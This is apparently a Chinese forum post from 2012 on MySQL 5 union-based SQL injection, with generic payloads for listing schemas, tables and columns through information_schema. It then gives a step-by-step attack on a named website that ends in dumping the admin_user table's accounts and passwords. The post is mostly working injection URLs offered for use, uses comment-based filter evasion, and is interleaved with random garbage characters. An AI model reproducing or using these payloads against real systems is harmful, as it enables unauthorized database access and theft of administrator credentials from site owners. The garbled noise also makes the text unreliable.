查库7 p- d7 b0 X4 t& k" Y% d8 l' d' D
3 m: Q" S4 m6 W7 A* H
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
( R1 O6 f$ L& W8 d4 e, B; l9 Q
( L/ P. V) W8 c e. V查表
. D6 \) G1 p5 q
) E7 n' \9 K0 s% gid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
. g7 Z$ r( [: F4 v3 Y
5 q7 i; d, N: S' @9 `- W查段
l. F" q/ I: j6 C4 q' X7 u
2 c0 o6 l6 }; r3 iid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
1 C' f5 y) N( x& F, |( u
) }+ L" r- t- e+ k* Z) F) x. `3 p. w( r5 s! \8 E5 a2 Q
mysql5高级注入方法暴表
( f) N- u5 D( g [% V% k5 y0 W& K$ F: H, K# p+ K- o
例子如下:, l+ N3 W2 k+ r$ }& d. o, S# z7 m* e
# i6 P$ d% i8 } V1 D) c
1.爆表
* F0 `5 O+ e# p9 d9 rhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet). ^ Q; i1 [; u2 B
这样爆到第4个时出现了admin_user表。( \- r' @9 D2 M8 V
N6 V% b* y' g4 @2.暴字段2 _( z9 z z( V1 E
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*. B4 q7 l5 k5 t" D8 V
" @/ z0 ^" u* e5 M; i
! f' U7 q7 Y Q- [$ q3.爆密码
! T3 m3 m$ ^ W% s# X/ y' W# ` q8 B3 Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
& M8 M+ d T+ j0 Z8 \/ u. S. s5 w" t3 l) K% F2 j4 J
" u. I. `3 x( ~+ O/ i. X8 y1 |
|
发表于 2012-9-13 16:29:37
收藏
支持
反对